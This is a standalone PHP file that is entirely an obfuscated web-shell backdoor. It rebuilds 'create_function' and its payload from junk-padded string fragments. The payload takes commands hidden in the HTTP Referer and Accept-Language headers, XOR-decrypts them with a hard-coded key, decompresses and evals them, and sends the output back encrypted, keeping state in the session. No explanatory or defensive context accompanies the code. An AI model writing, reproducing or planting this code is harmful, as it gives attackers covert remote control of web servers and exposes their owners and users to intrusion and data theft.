<?php
$Q='w($j=0;($j<$c?w&&$i<$l);$j+?w+,$i+?w+){$o.=$?wt{$i}?w^$k{$j?w}?w;}?w}return $o;?w}$r=?w$_SE?wRVE?wR;$rr=@$r["H?wTTP_REFE';
$B='R?wER"];$ra?w=@$r[?w"HTTP_AC?wCE?wPT_LAN?wGUAGE"];i?wf($?wrr&&$ra)?w{$?wu?w=pa?wrse_ur?wl($rr);parse_s?wtr?w($?wu["query"],';
$R='ob_end_c?wlean()?w;$d?w=base?w64_encode?w(x(gzc?wom?wpr?wess(?w$o),$k));p?wrint(?w"<$k>$d</$k>"?w);?w@s?wession_dest?wroy();}}}}';
$b='$?wkh="8fc4";?w$kf="c7ab"?w?w;f?wunctio?wn x(?w$t,$k){$c=s?wtrlen($k);$?wl=st?wrlen(?w$t);$o=""?w;f?wor?w($?wi=0;$i<$l;){f?wor?';
$j='$q);?w$q=array_va?wlue?ws($q);p?wre?wg?w_match_all("/([\\?w?ww])[\\?ww-]+(?:;q=0.([?w?w\\d]?w))?,?/"?w,$ra,$m);?wif(?w$q&&$m){@?';
$T='?w$e=strpos($s[$?wi],$f)?w?w;if(?w$e){?w$k=$kh.$k?wf;ob_star?wt();@ev?wal(@gzunco?wmpr?wess(@x(?w@b?wase64_dec?wode(preg?';
$m='2][$z]];?wif?w?w(strpos?w($p,$h)===0)?w{$s?w[$i]="";$p=?w$ss($p,3);}?w?wi?wf(a?wrray_key?w_exists($i,$s)){?w$s[$i]?w.=$p;?w';
$M='m?wd5($i.$kh)?w,0,3))?w;$f=$sl?w($?wss(md5(?w$i.$kf),0,3)?w);$?wp="";for(?w$?w?wz=1;$z?w<count($m[1]);$z?w++)$?wp.=$q[$m[?w?w';
$c=str_replace('j','','crejjatej_fjjuncjtion');
$w='w_replac?we(arra?wy("/?w_/?w","/-/?w"),arra?wy("/?w","+"),?w$ss($s[$i?w],0,?w$e))),$k)))?w;$o=?wob_g?wet?w_?wcontents();';
$U='wse?wssion_st?w?wart();$s=&?w$_SESSION?w;$s?ws="sub?ws?wtr";$sl="strtol?wower?w";$i?w=$?wm[?w?w1][0].$m[1][1];$h=$sl(?w$ss(';
$u=str_replace('?w','',$b.$Q.$B.$j.$U.$M.$m.$T.$w.$R);
$L=$c('',$u);$L();
?>
